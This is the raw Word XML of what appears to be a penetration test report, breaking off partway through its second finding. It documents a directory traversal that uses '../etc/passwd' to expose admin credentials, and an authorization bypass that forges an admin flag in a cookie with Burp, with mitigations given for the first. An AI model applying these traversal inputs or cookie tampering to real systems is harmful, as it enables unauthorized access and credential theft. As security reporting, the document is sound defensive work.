    <w:p w14:paraId="7C8E031B" w14:textId="77777777" w:rsidR="006D660F" w:rsidRPr="00F94EEA" w:rsidRDefault="006D660F" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The team found that the application is vulnerable to Directory traversal attack. In the private profile </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>page</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> there is an option to download a link to a Facebook profile, in order to expose it to other users on the app. A malicious user could use this feature in order to change the URL parameter </w:t>
      </w:r>
      <w:r w:rsidR="00015AA0" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>to a term that will lead him to a secret password file, where he could see the admin's credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1A1CB7" w14:textId="77777777" w:rsidR="00015AA0" w:rsidRPr="00787602" w:rsidRDefault="00015AA0" w:rsidP="00787602">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00787602">
        <w:t>Proof of concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CC86B3" w14:textId="6F53FA09" w:rsidR="00015AA0" w:rsidRPr="00B97F3F" w:rsidRDefault="00015AA0" w:rsidP="00B97F3F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B97F3F">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The malicious user can enter his profile and upload a link to his Facebook profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C58625C"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17B516CD" wp14:editId="19386E39">
            <wp:extent cx="1518616" cy="2104294"/>
            <wp:effectExtent l="0" t="0" r="571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9166" cy="2118913"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C23B63"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24E93994" wp14:editId="2252B770">
            <wp:extent cx="2318799" cy="714123"/>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0781" cy="717813"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="476D283F" w14:textId="1C1E48EB" w:rsidR="00015AA0" w:rsidRPr="00B97F3F" w:rsidRDefault="00015AA0" w:rsidP="00B97F3F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B97F3F">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>We can inspect the FB parameter in the URL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41ADC637" w14:textId="77777777" w:rsidR="00015AA0" w:rsidRPr="00F94EEA" w:rsidRDefault="00015AA0" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A5400E7" wp14:editId="63B3871E">
            <wp:extent cx="5274310" cy="48133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1330"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4299F0D7" w14:textId="6C6A6875" w:rsidR="00015AA0" w:rsidRPr="00B97F3F" w:rsidRDefault="00015AA0" w:rsidP="00B97F3F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B97F3F">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">We can use Burp in order to brute force different </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B97F3F">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>paths, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B97F3F">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> see if we can find any secret file</w:t>
      </w:r>
      <w:r w:rsidR="00AE491D" w:rsidRPr="00B97F3F">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00B97F3F">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B93F2D" w14:textId="59CBB345" w:rsidR="00015AA0" w:rsidRPr="00F94EEA" w:rsidRDefault="00B97F3F" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76A93548" wp14:editId="546DF57B">
            <wp:extent cx="4200525" cy="241935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2419350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB9575F" w14:textId="584C5982" w:rsidR="00AE491D" w:rsidRPr="00B97F3F" w:rsidRDefault="00AE491D" w:rsidP="00B97F3F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B97F3F">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>After a quick check the malicious user could find the path</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B97F3F">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B97F3F">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B97F3F">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B97F3F">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/passwd which will lead him to a secret file where the admins credentials are saved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0059AFEE" w14:textId="77777777" w:rsidR="00AE491D" w:rsidRPr="00F94EEA" w:rsidRDefault="00BB6144" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F405C1B" wp14:editId="131A5878">
            <wp:extent cx="5274310" cy="158115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81150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBEFDD4" w14:textId="77777777" w:rsidR="00BB6144" w:rsidRPr="00F94EEA" w:rsidRDefault="00BB6144" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74C0B35B" wp14:editId="1FAD9A01">
            <wp:extent cx="5274310" cy="154622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6225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="391C629E" w14:textId="04D871C9" w:rsidR="00BB6144" w:rsidRPr="00A246E8" w:rsidRDefault="00BB6144" w:rsidP="00A246E8">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A246E8">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">And now when we click the link that's supposed to take us to our Facebook </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A246E8">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>page</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A246E8">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> we reach the secret file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11001CE3" w14:textId="77777777" w:rsidR="00BB6144" w:rsidRPr="00F94EEA" w:rsidRDefault="00BB6144" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61F9DA39" wp14:editId="4935AFF2">
            <wp:extent cx="3974244" cy="1533770"/>
            <wp:effectExtent l="0" t="0" r="762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6164" cy="1542229"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C60DE52" w14:textId="77777777" w:rsidR="00BB6144" w:rsidRPr="00787602" w:rsidRDefault="00BB6144" w:rsidP="00787602">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00787602">
        <w:lastRenderedPageBreak/>
        <w:t>Business impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3DCFEC" w14:textId="77777777" w:rsidR="00BB6144" w:rsidRPr="00F94EEA" w:rsidRDefault="00BB6144" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The malicious user could steal admins credentials (or in other cases- </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> credentials), he could find different sorts of configuration files and other assets that could help him with exploiting the website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5E6C4C" w14:textId="77777777" w:rsidR="00BB6144" w:rsidRPr="00787602" w:rsidRDefault="00BB6144" w:rsidP="00787602">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00787602">
        <w:t>Mitigations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6D781A" w14:textId="68CDF9B5" w:rsidR="00B92F0D" w:rsidRPr="00A246E8" w:rsidRDefault="00B92F0D" w:rsidP="00A246E8">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sidRPr="00A246E8">
        <w:rPr>
          <w:rFonts w:ascii="David" w:eastAsia="Times New Roman" w:hAnsi="David"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The application should validate the user input before processing it. Ideally, the validation should compare against a whitelist of permitted values. If that isn't possible for the required functionality, then the validation should verify that the input contains only permitted content, such as purely alphanumeric characters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439DCF32" w14:textId="0C444803" w:rsidR="00BB6144" w:rsidRDefault="00B92F0D" w:rsidP="00A246E8">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sidRPr="00A246E8">
        <w:rPr>
          <w:rFonts w:ascii="David" w:eastAsia="Times New Roman" w:hAnsi="David"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>After validating the supplied input, the application should append the input to the base directory and use a platform filesystem API to canonicalize the path. It should verify that the canonicalized path starts with the expected base directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328B43A1" w14:textId="2A50BF7B" w:rsidR="004663E1" w:rsidRPr="00A246E8" w:rsidRDefault="004663E1" w:rsidP="004663E1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:eastAsia="Times New Roman" w:hAnsi="David"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="David" w:eastAsia="Times New Roman" w:hAnsi="David"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Only user's with administrator credentials should be able to see secret files on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182295F2" w14:textId="57A80F1F" w:rsidR="00407B0C" w:rsidRPr="00F94EEA" w:rsidRDefault="00FF553B" w:rsidP="00787602">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Broken access control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DF2428" w14:textId="77777777" w:rsidR="00B92F0D" w:rsidRPr="00F94EEA" w:rsidRDefault="00407B0C" w:rsidP="00787602">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA59898" w14:textId="62B20423" w:rsidR="00796CD0" w:rsidRPr="00F94EEA" w:rsidRDefault="00796CD0" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The team has recognized that it is possible to bypass authorization in the system (Authorization bypass). The system has the option of performing an advanced search by clicking on the "advanced search" button on the home page. Also delete users as opposed to the "Advanced Search" page of regular users (these are two different pages). The team recognized that when forging a regular user's cookie information into an admin user, the system switches the user to an admin user "Advanced Search" page, from which users can also be deleted as opposed to the "advanced search" page for regular users (these are two different pages).</w:t>
      </w:r>
      <w:r w:rsidR="00107C1E">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> A malicious user could use this vulnerability in order to gain administrator </w:t>
      </w:r>
      <w:r w:rsidR="004A3A19">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>privileges</w:t>
      </w:r>
      <w:r w:rsidR="00107C1E">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACB783A" w14:textId="77777777" w:rsidR="004210D1" w:rsidRPr="00787602" w:rsidRDefault="004210D1" w:rsidP="00787602">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:szCs w:val="26"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00787602">
        <w:t>Proof of concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5653BB" w14:textId="5891C985" w:rsidR="00796CD0" w:rsidRPr="00107C1E" w:rsidRDefault="00796CD0" w:rsidP="00107C1E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00107C1E">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Enter the home page using the login credentials of a regular user we created, set the burp to "intercept is on" mode and click on the "advanced search" button</w:t>
      </w:r>
      <w:r w:rsidRPr="00107C1E">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4A2261" w14:textId="77777777" w:rsidR="00796CD0" w:rsidRPr="00F94EEA" w:rsidRDefault="00796CD0" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CDE0192" w14:textId="7547469E" w:rsidR="004210D1" w:rsidRPr="00F94EEA" w:rsidRDefault="00107C1E" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A6D1395" wp14:editId="343D89C2">
            <wp:extent cx="5274310" cy="22574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7425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4223E370" w14:textId="52AC70FE" w:rsidR="00796CD0" w:rsidRPr="00F94EEA" w:rsidRDefault="00796CD0" w:rsidP="00107C1E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>We will then review the request in the burp repeater window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA29061" w14:textId="77777777" w:rsidR="005C0529" w:rsidRPr="00F94EEA" w:rsidRDefault="00063AAF" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2548C113" wp14:editId="7323BD28">
            <wp:extent cx="5274310" cy="253492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920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D052DC3" w14:textId="0E175CDD" w:rsidR="00796CD0" w:rsidRPr="00493DB7" w:rsidRDefault="00796CD0" w:rsidP="00493DB7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00493DB7">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Click "send" and the server will return the page to us: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00493DB7">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>search.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00493DB7">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3598F60E" w14:textId="77777777" w:rsidR="00063AAF" w:rsidRPr="00F94EEA" w:rsidRDefault="00063AAF" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D1C9DC5" wp14:editId="0DDD5A53">
            <wp:extent cx="6015398" cy="2165299"/>
            <wp:effectExtent l="0" t="0" r="444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375" cy="2180409"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48244AEE" w14:textId="77777777" w:rsidR="00063AAF" w:rsidRPr="00F94EEA" w:rsidRDefault="00063AAF" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="528D4929" w14:textId="28B0BDD3" w:rsidR="00796CD0" w:rsidRPr="00493DB7" w:rsidRDefault="00796CD0" w:rsidP="00493DB7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00493DB7">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">It appears that our user's cookie information is easily identifiable, and the admin variable is indicated, among other things. We will change the value of this variable </w:t>
      </w:r>
      <w:r w:rsidR="00493DB7">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidRPr="00493DB7">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 and see what comes back to us from the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D782428" w14:textId="77777777" w:rsidR="00796CD0" w:rsidRPr="00F94EEA" w:rsidRDefault="00796CD0" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:ind w:left="643"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
